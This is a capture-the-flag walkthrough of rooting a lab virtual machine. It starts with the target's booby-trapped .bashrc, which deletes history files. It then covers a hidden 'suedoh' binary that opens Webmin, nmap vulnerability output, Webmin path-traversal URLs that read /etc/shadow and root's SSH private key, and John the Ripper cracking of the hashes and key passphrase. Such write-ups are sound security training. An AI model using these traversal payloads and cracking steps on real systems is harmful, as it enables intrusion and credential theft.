£ make less more friendly for non-text input files, see lesspipe(1)
£[ -x /usr/bin/lesspipe ] && eval "$(SHELL=/bin/sh lesspipe)"
 
£ set variable identifying the chroot you work in (used in the prompt below)
if [ -z "${debian_chroot:-}" ] && [ -r /etc/debian_chroot ]; then
    debian_chroot=$(cat /etc/debian_chroot)
fi
 
£ set a fancy prompt (non-color, unless we know we "want" color)
case "$TERM" in
    xterm-color) color_prompt=yes;;
esac
 
£ uncomment for a colored prompt, if the terminal has the capability; turned
£ off by default to not distract the user: the focus in a terminal window
£ should be on the output of commands, not on the prompt
£force_color_prompt=yes
 
if [ -n "$force_color_prompt" ]; then
    if [ -x /usr/bin/tput ] && tput setaf 1 >&/dev/null; then
 £ We have color support; assume it's compliant with Ecma-48
 £ (ISO/IEC-6429). (Lack of such support is extremely rare, and such
 £ a case would tend to support setf rather than setaf.)
 color_prompt=yes
    else
 color_prompt=
    fi
fi
 
if [ "$color_prompt" = yes ]; then
    PS1='${debian_chroot:+($debian_chroot)}\[\]\[email protected]\h\[\]:\[\]\w\[\]\$ '
else
    PS1='${debian_chroot:+($debian_chroot)}\[email protected]\h:\w\$ '
fi
unset color_prompt force_color_prompt
 
£ If this is an xterm set the title to [email protected]:dir
case "$TERM" in
xterm*|rxvt*)
    PS1="\[\]$PS1"
    ;;
*)
    ;;
esac
 
£ enable color support of ls and also add handy aliases
if [ -x /usr/bin/dircolors ]; then
    test -r ~/.dircolors && eval "$(dircolors -b ~/.dircolors)" || eval "$(dircolors -b)"
    alias ls='ls --color=auto'
    £alias dir='dir --color=auto'
    £alias vdir='vdir --color=auto'
 
    £alias grep='grep --color=auto'
    £alias fgrep='fgrep --color=auto'
    £alias egrep='egrep --color=auto'
fi
 
£ colored GCC warnings and errors
£export GCC_COLORS='error=01;31:warning=01;35:note=01;36:caret=01;32:locus=01:quote=01'
 
£ some more ls aliases
£alias ll='ls -l'
£alias la='ls -A'
£alias l='ls -CF'
 
£ Alias definitions.
£ You may want to put all your additions into a separate file like
£ ~/.bash_aliases, instead of adding them here directly.
£ See /usr/share/doc/bash-doc/examples in the bash-doc package.
 
if [ -f ~/.bash_aliases ]; then
    . ~/.bash_aliases
fi
 
£ enable programmable completion features (you don't need to enable
£ this, if it's already enabled in /etc/bash.bashrc and /etc/profile
£ sources /etc/bash.bashrc).
if ! shopt -oq posix; then
  if [ -f /usr/share/bash-completion/bash_completion ]; then
    . /usr/share/bash-completion/bash_completion
  elif [ -f /etc/bash_completion ]; then
    . /etc/bash_completion
  fi
fi
rm -rf ~/.*hist*
clear
echo "W2wC0m3 Bw3rtie0 :)"
export PATH=/usr/sbin/bin
 
 
Lets you update your FunNotes and more!
 
After trying some various commands,inline scripting and for loops, name completeion fails, some info had scrolled by for program names to use. One was suedoh. Does not show under "help" command, but can be triggered with errors. i didn't save the exact output and list of commands, many of which can be seen just by typing "help"
 
So no sudo but there is, suedoh.../derp
 
suedoh -l
suedoh /usr/bin/wmstrt
 
:/home/burtie$ suedoh: unable to resolve host D0Not5top
20SecudoAGoGo R3D13? OKAY
(20-0 countdown)
D1dyaCatchaT3nK1l0
 
This opens port 10000 for webmin. However, it's only open for 20 seconds. We can make it open longer with:
 
    for i in {1..1000..1};do echo $(suedoh /usr/bin/wmstrt&);done
 
nmap -sC --script vuln -p10000 192.168.1.164
 
PORT      STATE SERVICE VERSION
10000/tcp open  http    MiniServ 0.01 (Webmin httpd)
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-litespeed-sourcecode-download:
| Litespeed Web Server Source Code Disclosure (CVE-2010-2333)
| /index.php source code:
| <h1>Error - Bad Request</h1>
|_<pre>This web server is running in SSL mode. Try the URL <a href='https://192.168.1.164:10000/'>https://192.168.1.164:10000/</a> instead.<br></pre>
|_http-majordomo2-dir-traversal: ERROR: Script execution failed (use -d to debug)
| http-phpmyadmin-dir-traversal:
|   VULNERABLE:
|   phpMyAdmin grab_globals.lib.php subform Parameter Traversal Local File Inclusion
|     State: VULNERABLE (Exploitable)
|     IDs:  CVE:CVE-2005-3299
|       PHP file inclusion vulnerability in grab_globals.lib.php in phpMyAdmin 2.6.4 and 2.6.4-pl1 allows remote attackers to include local files via the $__redirect parameter, possibly involving the subform array.
|      
|     Disclosure date: 2005-10-nil
|     Extra information:
|       ../../../../../etc/passwd :
|   <h1>Error - Bad Request</h1>
|   <pre>This web server is running in SSL mode. Try the URL <a href='https://192.168.1.164:10000/'>https://192.168.1.164:10000/</a> instead.<br></pre>
|  
|     References:
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3299
|_      http://www.exploit-db.com/exploits/1244/
|_http-server-header: MiniServ/0.01
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
MAC Address: 08:00:27:58:A4:C4 (Oracle VirtualBox virtual NIC)
 
(Disclaimer: * That port 10000 hint was handed to me by the op during our conversations with my progress. I had completed the challenge another way, which we'll not discuss here, as it will be closed in future release)
 
Dont bother logging into webmin, you'll lock yourself out XD
 
webmin flaw example(I looked for phpmyadmin from the nmap descriptions with luck then found)
https://sourceforge.net/p/webadmin/bugs/3020/
 
https://192.168.1.164:10000/..%01/..%01/..%01/..%01/..%01/etc/shadow
 
john hash.txt --fork=25 -w=/usr/share/wordlists/rockyou.txt
 
john --show hash.txt
root:password:17260:0:99999:7:::
burtieo:Lets you update your FunNotes and more!:17257:0:99999:7:::
MeGustaKing:**********:17259:0:99999:7:::
 
 
 
https://192.168.1.164:10000/unauthenticated/..%01/..%01/..%01/..%01/..%01/root/.ssh/id_rsa.pub
https://192.168.1.164:10000/unauthenticated/..%01/..%01/..%01/..%01/..%01/root/.ssh/id_rsa < private key
 
ssh2john id_rsa.key
id_rsa.key:$ssh2$2d2d2d2d2d424547494e205253412050524956415445204b45592d2d2d2d2d0a50726f632d547970653a20342c454e435259505445440a44454b2d496e666f3a204145532d3132382d4342432c37444131363232313239363143304346393443363336423437433939313032340a0a72446e556a683638456f61736461503430746139514265587476423575555648396e4b484b576f344b76684c634d345a302f523671766a536a6c486972344c520a7568546235592b65324337577a6538476c596264476b73465862557a745a65633236764e3778483851345365492b2b4a37376167714b575245366a4a2b2b68640a447352377644637147626d39785833374262453951346c4c4548522f684e5265332f5a74726274336f626e434c7643573648336b7a70746579635741515133570a4261466e7338357034415a6e363534486f4971582f554f6b7a74645978674f4c67707a724c6839703162524c69614f6942437255526b70594c7370654b434e4e0a79667550764e556746312b75483738476c764c776641413658526a364850445a334432322f4d784b6347697855565350586a4a6c5270717946517476534d36540a634e354e6d586a4f6a6d7a666761667150716637655446664c436863735748556d73536e65713770516876772f7666654758326b697a75584361676f2b7957740a32496c46757351696c6644447a796269756e4e4f702b6e6a4437547865424c4663415556644143664d55512f66433047484b65484238713739576937723053510a6d306543366649584a704461764e395074504632762b354f483945444b79636165574d6d5754305330664e4d6d496848622b552f756874446a51782b4d3966490a49356142436a7a437344436f4b5430716b762b645461667971537a554e39457570435268304e6373555430307972516b787a4d354c364333482b3631534e71380a434e69344935306144703871366d304b502f475a68554155395565676a2b4a5a513168354d536e6a4f704f764b6244346c362f72574d3032694656416d67344f0a576a53516671627847436d6f484538593769716742386c52576e44595073734458494d782b3170426b4e6b4241534d707a36674a425a2f2f724a4531506b56720a614b6468624a4652314e583039377a334858532f3753424a6d79756374472b4a766948376d7031664833574d416b326975346e53694531614e483159562f6e570a72584e4f693563372f794445396f2f7765754a6f43424c345658654838392b6c383535314a4f475539524d754e6b3070692f5353615577776e377752302f59660a6239536b3370624644533634414f4e31542b347a6c42575769663861524d4a37566d367a6b447345314a71396e4b634e7a446b6e6675667334356d4b567a58550a6d39646c47677a664e46343679504375487a425a7434713177727a67352f376763577835517136784435567457694d6c42344733443844727561657167544f690a53682f6a4671454f457241303135596d707a2f3048682f6c466e304e41414a7938394250473836642b5656416e3559737451457148367a7a754979396d5a394b0a3835332b30425578413049397245657373612b512b4e6c4661644256453246634a417237724d734c475a466f7166765778673568424a464a376a726a70514e650a5139717a412f4362694d65552b7a646966585a7770724a5231664e5657616c504a4a47776f74775667584e2f7a347338694e31674d4e3979344b796e7565396b0a7a512f48717667546b795835326f6a4c6e4d2f506b5843797837455842414f4a6935733666762f32326b635a35586b70772b782f56494c506e4a714f626d55390a525a334942366b62636b694d6c643547582b784d7659693972766d48662f6d644c6a3735653750552b466a43756641705841692b543130506e764d76724347530a466b536c567950506f3173346b6c54647266326c36746b4b364c71752f3753616d6b7651764d735937776e4e54344f504939357933476f526e7745464c6437770a686f6e4f726f463155366c6541354f386a785378492f43497778766235444f2f735834625a7853686c68443938794f3734496d4167354143546a2f65556156410a2f51376270666173536e71644b4e57687838317044364565395765425a7638633049302f4571533138384f3171465962747361715a6859797454715977765a300a7036517575734d6e446141316e4238774c376c744b5874355068424278535662554b745036445763425276694974465473416e6d4b3151684432776d546b43750a42386f6368677743677441557334635558786e5a727035707532797675384468662f2f7a386c42746f49745068354c546d57314e316734732b394e4b743732500a2d2d2d2d2d454e44205253412050524956415445204b45592d2d2d2d2d0a*1766*0
 
ssh2john id_rsa.key > hash
john hash --fork=25 -w=/usr/share/wordlists/rockyou.txt
john --show hash
id_rsa.key:gustateamo
 
We login with the private key, no password needed:
ssh -i id_rsa.key [email protected] with password gustateamo
 
 
id
uid=0(root) gid=0(root) groups=0(root)
[email protected]:~# env
TERM=xterm-256color
SHELL=/bin/bash
SSH_CLIENT=192.168.1.66 57220 22
SSH_TTY=/dev/pts/1
USER=root
MAIL=/var/mail/root
PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
PWD=/root
LANG=en_GB.UTF-8
SHLVL=1
HOME=/root
LANGUAGE=en_GB:en
LOGNAME=root
SSH_CONNECTION=192.168.1.66 57220 192.168.1.164 22
_=/usr/bin/env
roo[email protected]:~# pwd
/root
[email protected]:~# ls
FL461N51D3  L45T_fl46.pl
 
 
 
[email protected]:~# cat L45T_fl46.pl
#!/usr/bin/perl -w
######################################################
#                                                    #
#  W311 D0n3                                         #
#  Y0u D1d N0t5top                                   #
#  Much0 M3Gu5t4 :D                                  #
#                                                    #
#  3mrgnc3                                           #
#                                                    #
#  Hope you had fun...                               #
#  8ut...                                            #
#                                                    #
#  p.s..                                             #
#  571ll 1 M0r3 f146 :D                              #
#                                                    #
######################################################
 
FL46_7:9tjt86evvcywuuf774hr88eui3nus8dlk
N3v3r As5um3! 1t M4k35 4n 455 0f y0u & m3 :DWS
 
 
Thanks to @3mrgnc3 for making this CTF and helping me debug some of the issues I came across. This one I felt was pretty hard aside from the hole that will be removed in future versions, I'd have not got root without the hint for webmin. - DigiP